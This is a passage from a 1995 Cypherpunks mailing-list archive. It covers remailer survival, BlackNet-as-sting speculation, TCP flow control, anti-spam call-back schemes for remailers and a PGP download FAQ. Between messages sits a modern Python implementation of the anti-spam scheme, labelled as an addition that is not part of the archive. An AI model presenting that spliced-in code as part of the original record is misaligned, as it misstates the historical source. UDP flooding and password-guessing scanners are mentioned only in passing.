posts dealt with this.) (The owner of the site/machine can take a "hands off" attitude toward what his customers are doing in their accounts. 
This doesn't stop pressures from being applied, but it slows them down, and (probably) better insulates the owner from legal charges.) * Traffic needs to be increased. Remailers should probably go to constant padding traffic, to do this. Exhorting end-users to use remailers more won't be enough. * More offshore sites are needed. So far, only Canada and the Netherlands are offshore hosts (and Canada is effectively part of the U.S.). Some sites in Russia would be dramatic. Ditto for Asia, South America, etc. * The whole issue of "remailer businesses," with all the usual issues of digital postage, stamps, coupons, etc, has to be resolved. That is, we need to get some movement here. Most remailers are run as projects by students on machines they don't control, or that they can be pressured on, or with a committment to stay in business that will evaporate too easily. A business, with business responsibilities, is usually a more stable solution. I think we need to set some rough targets and brainstorm on how to get to them. For example, the Linux mavens could tell us if Linux-based remailer boxes could be hung on dedicated connections to The Little Garden network, as a specific example. A "black box remailer" such as several folks have suggested (Chaum (in 1981), me, Eric Hughes, others) might be buildable for under a grand. We could ask here for contributions, and might even raise this amount of money. Then each of us who contributed could have "accounts," maybe several of them. Imagine 100 or more "remailers" all on this one machine--I'm deliberately ignoring the security issue for now. Little Garden has stated categorically that they will not tell users what they can or can't do with their machines (though I can think of some cases where they might have to, as with spamming, etc.). Anyway, you can see where I'm headed. 
My big fear is that the one really major achievement of the Cypherpunks group, the remailers, are not increasing in number and could be knocked out all too easily with some legal attacks. It's time to get cracking on this crisis. --Tim May -- .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. Higher Power: 2^859433 | Public Key: PGP and MailSafe available. Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay From carolb at barton.spring.com Thu Jan 19 01:25:07 1995 From: carolb at barton.spring.com (Censored Girls Anonymous) Date: Thu, 19 Jan 95 01:25:07 PST Subject: remailer security In-Reply-To: Message-ID: Sorry I'm a tad late. This time I got axed for just two groups. C2.orgs WWW page doesn't, but only sameer knows for sure. And you might have fun looking at the "I thought you should see it first", in news.admin.policy Feel free to post it anywhere you like as anonymously as you like. There are lots CP ref's in it, and and if I don't do the reposting, I can't get in trouble. Now I've got to catch up reading & fixing WWW pages, and I'll link every WWW ref I see on this list in a dy or two. Thanks, Carol Anne RegisteredBEllcore Trusted Software Integrity system programmer *********************************************************************** Carol Anne Braddock "Give me your Tired, your Poor, your old PC's..." 
The TS NET REVOKED PGP KEY NO.0C91594D carolb at spring.com http://www.c2.org/~carolann carolann at c2.org ************************************************************************ COMING SOON TO AN INTERNET NEWSGROUP NEAR YOU...............CENSORED.COM On Tue, 17 Jan 1995, Mats Bergstrom wrote: > multiple chaining for the lazy, though: C2 lets you pick the chained > sites by clicking on a web-page (but does it encrypt??). > > Mats From craig at passport.ca Thu Jan 19 01:48:32 1995 From: craig at passport.ca (Craig Hubley) Date: Thu, 19 Jan 95 01:48:32 PST Subject: FBI and BLACKNET In-Reply-To: Message-ID: > On Tue, 17 Jan 1995, Craig Hubley (I) wrote: > > > Regarding BlackNet, I am not sure that they are not *run* by the FBI, > > or NSA, or CIA, MI6, Interpol, or some more mysterious quasi-governmental > > entity. > > The more I think about it the more this theory makes sense. I know > how they _could_ have traced me but this doesn't explain all their other > "leads" they are following up on and he seemed to imply there were many. > > >>> Not to mention entrapment is their MO. <<< > > What do you say we put the word out? Mixed feelings. On the one hand, I am starting to believe in this theory more and more. On the other hand, I think that having a BlackNet run by security agencies is actually a stabilizing thing to some degree: those who are foolish enough to deal with unknown parties with unknown interests in arbitrary secrets with petty motives will generally become neutralized. For instance, those who sell 2000 credit card numbers or 500 broken Digital Cash Card readouts (is this possible) can be paid or prosecuted at leisure. In either case, such folks will find more and more security holes plugged as they clearly identify where they are for the security agencies... this would prevent a general crackdown on cryptography etc., effectively the security agencies would have learned to work 'within the new realities'. 
I suspect targets might be less likely to be chosen by police discretion, and more likely to be chosen for their threat value, if they required less (discretionary) effort to investigate in the first place. Note that some laws, like small scale marijuana growing, often go unenforced unless there is a specific complaint or hard evidence is directly presented to police. In the 'BlackNet sting', such a flow of evidence would be constantly on its way in to the police, probably forcing them into more of a reactive mode, and definitely focusing their attention on those actively peddling secrets as opposed to those just trying to keep them. Not too bad for privacy. Furthermore, the flow of truly scary secrets flowing their way might make them ration their effort to plug leaks of high priority: nuclear weapon design, biological warfare blueprints, formulae for putting necrotizing fascitis into the common cold protein coat, 'gray goo' nanotechnology... and other things that constitute serious threats to life on this planet. This might probably divert effort away from prosecuting 'victimless crime', enhancing civil liberties. For once such agencies might be 'doing their job'. If indeed they have any legitimate job, which is always up for debate. Of course they will also engage in petty prosecution of those who they perceive are acting against their narrow interests, but all organisms act to preserve and advance themselves... this comes and goes with their leaders (J. Edgar Hoover, William Casey come to mind as good/bad examples) who hopefully turn over with the tide of politics, minimizing the abuses in the long run. Of course this is little consolation to those they target. Systematic abuses might be more easily revealed by 'whistleblowers' if there were a clear record kept 'inside' of which leads were followed and which not. Blow the whistle? Sure, we could. But what difference does it make? 
If no one trusts BlackNets, then the security agencies just take a different route to building up credibility for a 'sting', using more private means, or many such more private means, and again we increase their discretionary powers as they decide where to devote effort to building up a reputation (hmm do we target Columbian druglords? biohackers? breakaway republics? cryptographers?) and thereby where to concentrate enforcement. Perhaps by blowing a whistle on a 'BlackNet sting' we simply force them to evolve to more devious methods, that require more planning, and costs more (thus maybe reducing their overall activity - although history says otherwise) but in the long run is even more directed by the interest/prejudice of leaders. It may be that the simpler and more reactive the methods they apply, the better. It is largely premeditated human scheming that starts wars, isn't it? Not simple knee jerks. Perhaps others believe otherwise, but not really an issue for debate in cypherpunks. Perhaps it is better to co-opt agencies by giving them a reason to adopt the cryptographer's agenda. It's got to be cheaper and easier for them to sit and buy secrets than it is to go out and dig them up themselves... and cryptography generally advances that capability as folks feel safe using it to transmit secrets electronically. Of course the idea that black nets must be a sting is speculation, but it would hardly be the first time that security agencies and those that they officially target had developed a symbiotic relationship. Here in Canada it was recently revealed that CSIS (the 'Canadian CIA') had been actively involved in the founding of the Heritage Front, a neo-Nazi group. In fact one of their leaders was an agent! Interestingly, this appears to be a more effective/cheaper way to control a large group of otherwise dangerous people - if they want to follow a leader, let them! 
Just make sure the leader is someone you control and you can prevent things from getting too far out of hand. Which is the only time that CSIS or the CIA should be stepping in anyway. It is sort of a pre-emptive strike and not at all 'politically correct' in a liberal democracy, but they do it anyway. That's life. And maybe it's easier to keep an eye on simple forms of life. Craig Hubley Business that runs on knowledge Craig Hubley & Associates needs software that runs on the Web craig at passport.ca 416-778-6136 416-778-1965 FAX From rparratt at london.micrognosis.com Thu Jan 19 02:12:54 1995 From: rparratt at london.micrognosis.com (Richard Parratt) Date: Thu, 19 Jan 95 02:12:54 PST Subject: Internet, spamming, etc. Message-ID: <9501191012.AA04837@pero> > From owner-cypherpunks at toad.com Wed Jan 18 17:00:14 1995 > Date: Wed, 18 Jan 1995 07:54:00 -0800 > I also think this is the one great flaw in the design of the Internet; > namely, that the sender has all the control over what packets flow > over the net. A receiver can ask for a slowdown or cessation, but > there's no obligation to do so. This will be, if anything, the > limiting factor in scalability of the internet. In theory, yes. However, almost all Internet protocols are TCP/IP based. The receiver of a TCP connection can choose not to accept the connection, or to drop it at any time. The window protocol keeps the sender from transmitting faster than any part of the connection can manage. (How do you think ftp transfers between sites with disparate connection speeds would work otherwise?) One could theoretically have a package that sprayed UDP packets at a particular IP address, or even have a modified TCP that ignored disconnects. I think most service providers would regard using such code as being on a par with running a program that tried to telnet sequentially to all known IP addresses, trying common passwords on each. 
-- Richard Parratt

From lmccarth at ducie.cs.umass.edu Thu Jan 19 02:30:36 1995
From: lmccarth at ducie.cs.umass.edu (L. McCarthy)
Date: Thu, 19 Jan 95 02:30:36 PST
Subject: Anti-Spam Methods
Message-ID: <199501191035.FAA07879@bb.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

Nathan Zook writes:
> Ivan Boskey? (sp)

"Boesky"

[...]
> We are capable of controlling mail bombs, for instance, in the
> following way:
>
> Take an incoming message, capture From: line. Strip header. MD5 body.
> Add to sorted table [From: MD5(message) date]. Check for repetition of
> first two fields. If reps = 1, forward message. If reps = 2, send message
> to From: "Possible error. Two copies of message received."

We were just discussing this on the remailer operators' list. Homer was mulling over sending an automatic acknowledgement of each article submitted for anon posting. I pointed out that From: lines (and even From lines) are notoriously unreliable. For example, in the Scythe spam, the articles were ostensibly from various people @crl.com. Autoacks might have raised the ire of plenty of people, but wouldn't have reached the real perpetrator.

> If reps = 0 mod 5, send letter to postmaster at From:. "Possible mailbomb or
> spam. copies of received from at your site in the
> past week." Clear table of entries more than a week old every midnight.

This would necessitate keeping full logs of all traffic passing through the remailer for up to a week. Speaking only for myself, I can't imagine adopting such a remailer policy. YMMV.

> If all remailers did this, then no matter where the net was entered,
> the messages would be rejected. And spammers/bombers would be spamming/
> bombing their own postmaster.

Again, in a forged-spam case like Scythe, the spammers/bombers would be inducing the remailers to spam/bomb some arbitrary postmasters -- perhaps even the remailers' postmasters -- as a side effect.

A "call-back" scheme might, however, be used to verify an originator's address. In this scheme, when a remailer receives a message for remailing, it generates a few lines of random garbage and associates them with the message. These lines are sent, along with a hash of the original message, in a brief ack message to the address in the From: line of the message. The headers of the message are discarded. When the remailer receives a message with a Callback: header, it checks the reply against the table associated with the current message pool. If a match is found, the associated message is marked ready for remailing. After a fairly short period, a message which still hasn't been marked for remailing is deleted.

With chaining, more record-keeping by the remailers would be needed. The remailers can't automatically honor all callbacks from other remailers, because wise forgers would simply forge their mail so it appeared to originate from some known remailer address. So each remailer would need to keep (for a brief period) a hash of each message it remails, in order to decide which callback queries to answer. A list of current remailers could be used to winnow out messages which are not being remailed to other remailers, and hence need not be hashed and kept.

This protocol would aid a remailer operator who decided to trace a spam in progress, because it should prevent spammers from forging their messages. Couple this with mandatory appending of encrypted reply blocks, and the release valve of two-way communication might be opened. Legal proceedings obviously can't be brought successfully against anonymous parties, so achieving common carrier status is about the only antidote to that problem I can foresee at the moment.

I'm thinking about working on code to implement some of this stuff in existing remailer software, so I'm especially interested in hearing objections, flames, suggestions, encouragement, etc. about it.
I've spent a while contemplating the wants and needs of prospective benign remailer users -- market research, if you will. At this point, I think patching together various pieces of existing remailer technology might greatly improve the attractiveness of the c'punks style remailers.

-L. Futplex McCarthy; PGP key by finger or server
"The objective is for us to get those conversations whether they're by an alligator clip or ones and zeroes. Wherever they are, whatever they are, I need them." -FBI Dir. Freeh

- ---
[This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.]

From rah at shipwright.com Thu Jan 19 03:25:14 1995
From: rah at shipwright.com (Robert Hettinga)
Date: Thu, 19 Jan 95 03:25:14 PST
Subject: Law of Electronic Commerce -- seminar announcement
Message-ID:

FWIW,
Bob Hettinga

>From: nsb at radiomail.net
>Date: Wed, 18 Jan 1995 14:16:54 -0800
>To: inet-marketing at einet.net, www-buyinfo at allegra.att.com,
>    edi-new at tegsun.harvard.edu, ietf-edi at byu.edu
>Original-From: "NSB's Portable (via RadioMail)"
>Subject: Law of Electronic Commerce -- seminar announcement
>Reply-To: Nathaniel Borenstein (via RadioMail)
>
>To help educate business professionals about electronic commerce,
>First Virtual (TM) Holdings Incorporated is pleased to lend promotional
>support to:
>
>                Law of Electronic Commerce
>                     On-line Seminar
>           Starting January 30, March
13, and May 9, 1995 > Future Dates to Be Announced > >The National Computer Security Association announces a new form of >professional education -- an on-line seminar. It is education >delivered through the NCSA InfoSecurity Forum on CompuServe. >(Internet delivery is also available.) For 30 days, attorney >Benjamin Wright will convene a seminar covering The Law of >Electronic Commerce -- EDI and E-mail Contracts and Records. > >Participants will attend the seminar by exchanging computer >messages with Wright in a private discussion forum. Thus, no one >will have to travel or miss time away from the office or home. > >The seminar is designed for security managers, Online and MIS >professionals, EDI managers, purchasing managers who use EDI and E- >mail, lawyers, accountants and auditors. Topics on the agenda: > >1. Electronic Contracts >2. Electronic Data Interchange (EDI) and Electronic Funds Transfer >3. Electronic Signatures >4. EDI Trading Partner Agreements >5. Value-Added Network Agreements >6. Electronic & Optical Evidence >7. EDI & Optical Tax Records >8. UCC Article 4A >9. Electronic Healthcare Data >10. E-mail Privacy > >Tuition is $350 for NCSA members and $395 for non-members. (Group >discounts are available.) > >The starting dates for the next three sessions of the seminar are >January 30, March 13, and May 9, 1995. > >Special Guest Lecturers: > > Nathaniel Borenstein, Chief Scientist, > First Virtual Holdings Incorporated > > Richard K. Crone of KPMG Peat Marwick LLP, > electronic banking expert > >Views expressed in the seminar are those of the individuals expressing >them and not necessarily those of sponsors, employers or anyone else. > >To register on-line, or for more information and a free brochure, point >your browser at the following URL: > >http://www.infohaus.com/sponsored/ncsa-seminar.html > >Or write to: > >National Computer Security Association >10 South Courthouse Ave. 
>Carlisle, PA 17013 >Tel: (800) 488-4595 >Tel: (717) 258-1816 >Fax: (717) 243-8642 >bwrigh01 at reach.com > > (This Notice May Be Distributed Freely) ----------------- Robert Hettinga (rah at shipwright.com) "There is no difference between someone Shipwright Development Corporation who eats too little and sees Heaven and 44 Farquhar Street someone who drinks too much and sees Boston, MA 02331 USA snakes." -- Bertrand Russell (617) 323-7923 From entropy at IntNet.net Thu Jan 19 03:41:25 1995 From: entropy at IntNet.net (Jonathan Cooper) Date: Thu, 19 Jan 95 03:41:25 PST Subject: Internet, spamming, etc. In-Reply-To: <9501191012.AA04837@pero> Message-ID: > One could theoretically have a package that sprayed UDP packets > at a particular IP address, or even have a modified TCP > that ignored disconnects. I think most service providers > would regard using such code as being on a par with running > a program that tried to telnet sequentially to all known IP > addresses, trying common passwords on each. Code exists to do all of the things that you've mentioned. That was the original point of the discussion. -jon ( --------[ Jonathan D. Cooper ]--------[ entropy at intnet.net ]-------- ) ( PGP 2.6.2 keyprint: 31 50 8F 82 B9 79 ED C4 5B 12 A0 35 E0 9B C0 01 ) ( home page: http://taz.hyperreal.com/~entropy/ ]---[ Key-ID: 4082CCB5 ) From rparratt at london.micrognosis.com Thu Jan 19 03:51:53 1995 From: rparratt at london.micrognosis.com (Richard Parratt) Date: Thu, 19 Jan 95 03:51:53 PST Subject: Internet, spamming, etc. Message-ID: <9501191151.AA04857@pero> > > One could theoretically have a package that sprayed UDP packets > > at a particular IP address, or even have a modified TCP > > that ignored disconnects. I think most service providers > > would regard using such code as being on a par with running > > a program that tried to telnet sequentially to all known IP > > addresses, trying common passwords on each. 
>
> Code exists to do all of the things that you've mentioned.
>
> That was the original point of the discussion.

No doubt it does. But my assertion is that most service providers would cut you off if you tried running such code, especially the latter case.

-- Richard Parratt

From habs at cmyk.warwick.com Thu Jan 19 06:38:47 1995
From: habs at cmyk.warwick.com (Harry S. Hawk)
Date: Thu, 19 Jan 95 06:38:47 PST
Subject: Lance Rose writes anti-cryptoanarchy in WIRED
In-Reply-To: <199501190459.UAA26969@netcom12.netcom.com>
Message-ID: <9501191738.AA23269@cmyk.warwick.com>

Lance Rose is a good guy... IMHO..

1) I use his legal services

2) I haven't read the article but it seems reasonable esp. if we don't have NON-Escrowed encryptions... e.g., if clipper wins I think Lance is probably correct...

3) he can be reached at 72230.2044 at compuserve.com

From perry at imsi.com Thu Jan 19 06:41:35 1995
From: perry at imsi.com (Perry E. Metzger)
Date: Thu, 19 Jan 95 06:41:35 PST
Subject: Lance Rose writes anti-cryptoanarchy in WIRED
In-Reply-To: <199501190404.UAA24779@netcom6.netcom.com>
Message-ID: <9501191441.AA03662@snark.imsi.com>

Timothy C. May says:
> Second, I didn't know Lance Rose was a lawyer, or even a "SysLawyer"
> (?). When I met him a couple of years ago, he'd just gotten out of
> jail and was working for the satellite Usenet distribution company
> (whose name I don't recall, and who I've heard less of than I might've
> expected to, subjunctively speaking).

Don't confuse Len Rose and Lance Rose. One is indeed a lawyer -- in fact, he's my lawyer.

Perry

Who notes that he's not the only person shooting from the hip these days.
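
An added example, not part of any message in this archive: the duplicate table quoted in the "Anti-Spam Methods" message above, together with the call-back scheme that message proposes, written out in Python. The class and function names, the 15-minute expiry, the `drop` action for repetition counts the proposal does not mention, and the sample addresses are assumptions.

```python
import hashlib
import secrets
from collections import defaultdict

WEEK = 7 * 24 * 3600      # retention of table rows in the quoted proposal
CALLBACK_TTL = 15 * 60    # assumed; the post says only "a fairly short period"


def body_digest(body):
    # MD5 is the hash the 1995 proposal names and is kept for fidelity;
    # a remailer written today would use SHA-256 here.
    return hashlib.md5(body.encode("utf-8")).hexdigest()


class DuplicateTable:
    """The [From, MD5(body), date] table; it stores digests, not bodies."""

    def __init__(self):
        self.rows = defaultdict(list)          # (sender, digest) -> timestamps

    def purge(self, now):
        # Runs on every insert here instead of once at midnight.
        for key in list(self.rows):
            fresh = [t for t in self.rows[key] if now - t < WEEK]
            if fresh:
                self.rows[key] = fresh
            else:
                del self.rows[key]

    def record(self, sender, body, now):
        """Count this copy and return the action for its repetition number."""
        self.purge(now)
        stamps = self.rows[(sender, body_digest(body))]
        stamps.append(now)
        reps = len(stamps)
        if reps == 1:
            return "forward"
        if reps == 2:
            return "notify-sender"             # "Possible error. Two copies..."
        if reps % 5 == 0:
            return "notify-postmaster"         # "Possible mailbomb or spam."
        return "drop"                          # assumed; the proposal is silent


class CallbackPool:
    """Hold each message until the claimed From: address returns its nonce."""

    def __init__(self):
        self.pending = {}                      # nonce -> held message

    def submit(self, claimed_from, body, now):
        """Queue a message; return the ack mailed to the claimed address."""
        nonce = secrets.token_hex(16)          # the "random garbage" lines
        self.pending[nonce] = {"sender": claimed_from, "body": body,
                               "expires": now + CALLBACK_TTL}
        return {"to": claimed_from, "callback": nonce,
                "digest": body_digest(body)}

    def expire(self, now):
        for nonce in [n for n, m in self.pending.items() if m["expires"] <= now]:
            del self.pending[nonce]

    def confirm(self, nonce, now):
        """Process a reply carrying a Callback: header.

        Only the nonce is checked: the reply's own From: line is as forgeable
        as any other, and possession of the nonce is the evidence that the
        claimed mailbox received the ack. Returns the released message or None.
        """
        self.expire(now)
        return self.pending.pop(nonce, None)


def run_scenario():
    """Constructed traffic: one genuine sender, one forged From: line."""
    pool, table, t0 = CallbackPool(), DuplicateTable(), 1_000_000
    out = {}

    # Genuine sender receives the ack and answers it.
    ack = pool.submit("alice@example.org", "hello list", t0)
    msg = pool.confirm(ack["callback"], t0 + 60)
    out["genuine"] = table.record(msg["sender"], msg["body"], t0 + 60)

    # A forger names a third party. The ack goes to that party, who never
    # answers, so the forger never learns the nonce and the message expires.
    forged = pool.submit("victim@example.net", "BUY NOW", t0)
    out["ack_to"] = forged["to"]
    out["guess"] = pool.confirm(secrets.token_hex(16), t0 + 120)
    out["late"] = pool.confirm(forged["callback"], t0 + CALLBACK_TTL + 1)

    # The verified sender repeats the same body: the table escalates.
    out["repeats"] = [table.record("alice@example.org", "hello list", t0 + 100 + i)
                      for i in range(4)]
    return out


if __name__ == "__main__":
    print(run_scenario())
```

In the forged case one short ack still reaches the address named in the From: line; the held message itself is never remailed and never enters the duplicate table.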
From stuart at surety.com Thu Jan 19 07:10:45 1995 From: stuart at surety.com (Stuart Haber) Date: Thu, 19 Jan 95 07:10:45 PST Subject: Surety Technologies announces: Digital Notary System is on-line Message-ID: <9501191509.AA00167@surety.com> Many readers of this list have heard about the work that Scott Stornetta and I have done, beginning as Bellcore researchers a few years ago, on the problem of cryptographically secure digital time-stamping. In 1993 Bellcore spun off a company in order to commercialize this work. The company is called Surety Technologies, and we call our product and service the Digital Notary(tm) System. I am happy to report that we have just launched the product. To read about it, as well as to get the software, please visit our World-Wide Web home page: http://www.surety.com You can get the software and installation instructions directly by anonymous ftp to ftp.surety.com in the directory /dns/windows. Scott and I would both like to thank those readers of the list who have offered us their support, encouragement, and advice over the years. Stuart Haber | Surety Technologies provides Chief Scientist | the Digital Notary(tm) System. Surety Technologies, Inc. | General info: info at surety.com stuart at surety.com | (201) 701-0600, fax -0601 From mpj at netcom.com Thu Jan 19 07:18:01 1995 From: mpj at netcom.com (Michael Paul Johnson) Date: Thu, 19 Jan 95 07:18:01 PST Subject: Where to Get PGP FAQ Message-ID: -----BEGIN PGP SIGNED MESSAGE----- ===============================BEGIN SIGNED TEXT============================= WHERE TO GET THE PRETTY GOOD PRIVACY PROGRAM (PGP) (Last modified: 17 January 1995 by Mike Johnson) WHAT IS THE LATEST VERSION? 
|-----------------+---------------------+---------------------------------|
| Platform(s)     | Latest Version      | Distribution File Names         |
|-----------------+---------------------+---------------------------------|
| DOS, Unix,      | Viacrypt PGP 2.7    | disk sets                       |
| Mac, Windows,   |                     |                                 |
| or WinCIM/CSNav |                     |                                 |
|-----------------+---------------------+---------------------------------|
| DOS, Unix,      | MIT PGP 2.6.2       | pgp262.zip (DOS + docs)         |
| others          |                     | pgp262s.zip (source)            |
|                 |                     | pg262s.zip source on CompuServe |
|                 |                     | pgp262.tar.gz (source)          |
|                 |                     | pgp262.gz (same as above on DOS)|
|                 |                     | pgp262.tar.Z (source)           |
|                 |                     | pgp262dc.zip (documentation)    |
|                 |                     | pg262d.zip (docs on CompuServe) |
|-----------------+---------------------+---------------------------------|
| Macintosh       | MIT PGP 2.6         | MacPGP2.6.sea.hqx (binary+docs) |
|                 |                     | macpgp26.hqx (same as above)    |
|                 |                     | MacPGP2.6.src.sea.hqx (source)  |
|                 |                     | macpgp26.src (same as above)    |
|                 |                     | MacPGP2.6-68000.sea.hqx (binary)|
|                 |                     | mcpgp268.hqx (same as above)    |
|-----------------+---------------------+---------------------------------|
| Mac Applescript | MacPGP 2.6ui v 1.2  | MacPGP-2.6ui-v1.2.sit.hqx       |
|                 | + some beta versions| MacPGP2.6ui_V1.2_sources.cpt.hqx|
|                 | based on MIT PGP    | MacPGP2.6uiV1.2en.cpt.hqx       |
|                 | 2.6.2               | MacPGP2.6uiV1.2src.cpt.hqx      |
|                 |                     | MacPGP2.6uiV1.2.68000.hqx       |
|                 |                     | MacPGP2.6.2.beta*.sea.hqx       |
|                 |                     | MacPGP2.6.2.beta*.src.sea.hqx   |
|-----------------+---------------------+---------------------------------|
| Amiga           | PGP 2.6.2 Amiga 1.4 | pgp262-a14-000.lha              |
|                 |                     | pgp262-a14-020.lha              |
|                 |                     | pgp262-a14-src.lha              |
|-----------------+---------------------+---------------------------------|
| Atari           | Atari PGP 2.6.1     | pgp261st.zip                    |
|                 |                     | pgp261b.lzh                     |
|-----------------+---------------------+---------------------------------|
| Non-USA version | PGP 2.6.i from      | pgp26i.zip                      |
| to avoid RSAREF | Stale Schumacher    | pgp26is.zip                     |
| license.        |                     | pgp26is.tar.gz                  |
|_________________|_____________________|_________________________________|

PGP BOOKS

Protect Your Privacy: A Guide for PGP Users
by William Stallings
Prentice Hall PTR
ISBN 0-13-185596-4
US $19.95

PGP: Pretty Good Privacy
by Simson Garfinkel
O'Reilly & Associates, Inc.
ISBN 1-56592-098-8
US $24.95

If you order Stallings' book from National Computer Security Association (74774.1326 at compuserve.com) they will donate $1 of the price to Phil Zimmermann's legal defense fund.

WHERE CAN I GET THE PGP VERSION DIRECTLY FROM PHILIP ZIMMERMANN?

Get the MIT version. See http://web.mit.edu/network/pgp-form.html

WHAT IS PGP 2.6.i?

Stale Schumacher released an international version of PGP built the "right way." By "right way," I mean that it uses the latest MIT code, but uses a different rsaglue.c to use the mpilib instead of RSAREF for RSA calculations, thus including all the latest bug fixes and features in the main freeware PGP code line, but frees non-USA persons from the limitations of the RSAREF license. This release has been as strongly endorsed by Philip Zimmermann as he can do without incriminating himself. Naturally, by not using the RSAREF code for RSA calculations, this version is not legal for use in the USA (other than limited research, etc.), but is fine anywhere else (like Canada) where RSA patents don't hold.

Note that the latest version of Stale Schumacher's PGP is 2.6.i; 2.6i (without the second .) was a beta test version that has been superseded.

WHAT IS PGP 2.6ui?

The "unofficial international" versions are really just PGP 2.3a, modified just enough to make it compatible with MIT PGP 2.6, but do not include all of the fixes in MIT PGP 2.6 and MIT PGP 2.6.1. They have a "ui" somewhere in their file names.

WHERE CAN I GET VIACRYPT PGP?

Contact Viacrypt in Phoenix, Arizona, USA.
The commercial version of PGP is fully licensed to use the patented RSA and IDEA encryption algorithms in commercial and government environments in the USA and Canada. It is fully compatible with, functionally the same as, and just as strong as the freeware version of PGP. Due to limitations on ViaCrypt's RSA distribution license, ViaCrypt only distributes executable code and documentation for it, but they are working on making PGP available for a variety of platforms. Call or write to them for the latest information. The latest version number for Viacrypt PGP is 2.7.

Here is a brief summary of Viacrypt's currently-available products:

1. ViaCrypt PGP for MS-DOS. Prices start at $99.98

2. ViaCrypt PGP for UNIX. Includes executables for the following platforms:
     SunOS 4.1.x (SPARC)
     IBM RS/6000 AIX
     HP 9000 Series 700/800 UX
     SCO 386/486 UNIX
     SGI IRIX
     AViiON DG-UX(88/OPEN)
   Prices start at $149.98
   Executables for the following additional platforms are available upon request for an additional $30.00 charge.
     BSD 386
     Ultrix MIPS DECstation 4.x

3. ViaCrypt PGP for WinCIM/CSNav. A special package for users of CompuServe. Prices start at $119.98

Please contact ViaCrypt for quantity discount pricing. Orders may be placed by calling 800-536-2664 during the hours of 8:30am to 5:00pm MST, Monday - Friday. They accept VISA, MasterCard, AMEX and Discover credit cards.

If you have further questions, please feel free to contact:

Paul E. Uhlhorn
Director of Marketing, ViaCrypt Products
Mail: 9033 N. 24th Avenue Suite 7 Phoenix AZ 85021-2847
Phone: (602) 944-0773
Fax: (602) 943-2601
Internet: viacrypt at acm.org
Compuserve: 70304.41

WHERE CAN I GET THE FREEWARE PGP?

These listings are subject to change without notice. If you find that PGP has been removed from any of these sites, please let me know so that I can update this list.
Likewise, if you find PGP on a good site elsewhere (especially on any BBS that allows first time callers to access PGP for free), please let me know so that I can update this list. Because this list changes frequently, I have not attempted to keep it complete, but there should be enough pointers to let you easily find PGP.

There are several ways to get the freeware PGP: ftp, WWW, BBS, CompuServe, email ftp server, and sneakernet (ask a friend for a copy). Just don't ask Philip Zimmermann directly for a copy.

FTP SITES IN NORTH AMERICA

There are some weird hoops to jump through, thanks to the U. S. Department of State, at many of these sites. This is apparently because the U. S. Department of State wants to make it easier for people outside of North America to develop, distribute, use, or sell strong cryptographic software than people inside of the USA and Canada -- at least that is the effect of their rules.

Telnet to net-dist.mit.edu, log in as getpgp, answer the questions, then ftp to net-dist.mit.edu and change to the hidden directory named in the telnet session to get your own copy. MIT-PGP is for U. S. and Canadian use only, but MIT is only distributing it within the USA (due to some archaic export control laws).

You can also get PGP from:

ftp.csn.net/mpj
  See ftp://ftp.csn.net/mpj/README.MPJ
ftp.netcom.com/pub/mp/mpj
  See ftp://ftp.netcom.com/pub/mp/mpj/README.MPJ
ftp.netcom.com/pub/gr/grady/PGP (U. S. and Canada only).
ftp.eff.org
  Follow the instructions found in README.Dist that you get from one of:
  ftp://ftp.eff.org/pub/Net_info/Tools/Crypto/README.Dist
  gopher.eff.org, 1/Net_info/Tools/Crypto
  gopher://gopher.eff.org/11/Net_info/Tools/Crypto
  http://www.eff.org/pub/Net_info/Tools/Crypto/
ftp.csua.berkeley.edu (for U. S.
or Canadian users) /pub/cypherpunks/pgp/ ftp.gibbon.com /pub/pgp/README.PGP (OS/2 users see also /pub/gcp/gcppgp10.zip) ftp.wimsey.bc.ca /pub/crypto/software/dist/README WORLD WIDE WEB ACCESS http://web.mit.edu/network/pgp-form.html http://www.ifi.uio.no/~staalesc/PGPVersions.html http://www.mantis.co.uk/pgp/pgp.html http://rschp2.anu.edu.au:8080/crypt.html http://www.eff.org/pub/Net_info/Tools/Crypto/ http://community.net/community/all/home/solano/sbaldwin http://www.cco.caltech.edu/~rknop/amiga_pgp26.html COMPUSERVE GO NCSAFORUM. Follow the instructions there to gain access to Library 12: Export Controlled. PGP may be other places, too. Compuserve file names are even more limited than DOS (6.3 instead of the already lame 8.3), so the file names to look for are PGP262.ZIP, PG262S.ZIP (source code), PGP262.GZ (Unix source code) and PG262D.ZIP (documentation only). BULLETIN BOARD SYSTEMS Colorado Catacombs BBS Mike Johnson, sysop Mac and DOS versions of PGP, PGP shells, and some other crypto stuff. Also the home of some good Bible search files and some shareware written by Mike Johnson, including ATBASH, DLOCK, CRYPTA, CRYPTE, CRYPTMPJ, MCP, MDIR, DELETE, PROVERB, SPLIT, ONEPAD, QUICRYPT, etc. v.FAST/v.32bis/v.42bis, speeds up to 28,800 bps 8 data bits, 1 stop, no parity, as fast as your modem will go. Use ANSI terminal emulation, or if you can't, try VT-100. Free access to PGP. If busy or no answer, try again later. For free access: log in with your own name, answer the questions, then select [Q]uestionaire 3 from the [M]ain menu. (303) 772-1062 Longmont, Colorado number - 2 lines. (303) 938-9654 Boulder, Colorado number forwarded to Longmont number intended for use by people in the Denver, Colorado area. 
The Freedom Files BBS, DeLand Florida, USA 904-738-2691
Exec-Net, New York, NY, USA (Host BBS for the ILink net) 914-667-4567
The Ferret BBS (North Little Rock, Arkansas) (501) 791-0124 also (501) 791-0125
  Special PGP users account: login name: PGP USER password: PGP
CVRC BBS 317-791-9617
CyberGold BBS 601-582-5748
Self-Governor Information Resource, 915-587-7888, El Paso, Texas, USA
In the UK, try 01273-688888
MAUS BBS (+49 781 38807) Offenburg, Germany - connected to MausNet

OTHER FTP SITES

ftp.informatik.uni-hamburg.de
  /pub/virus/crypt/pgp
  This site has most, if not all, of the current PGP files.
ftp.leo.org
  /pub/com/os/os2/crypt
ftp.ox.ac.uk (163.1.2.4)
  /pub/crypto/pgp
  This is a well organized site with most of the current PGP files as well as shells and mailer scripts.
ftp.netcom.com
  /pub/dc/dcosenza -- Some crypto stuff, sometimes includes PGP.
unix.hensa.ac.uk
  /pub/uunet/pub/security/virus/crypt/pgp
ftp.ee.und.ac.za
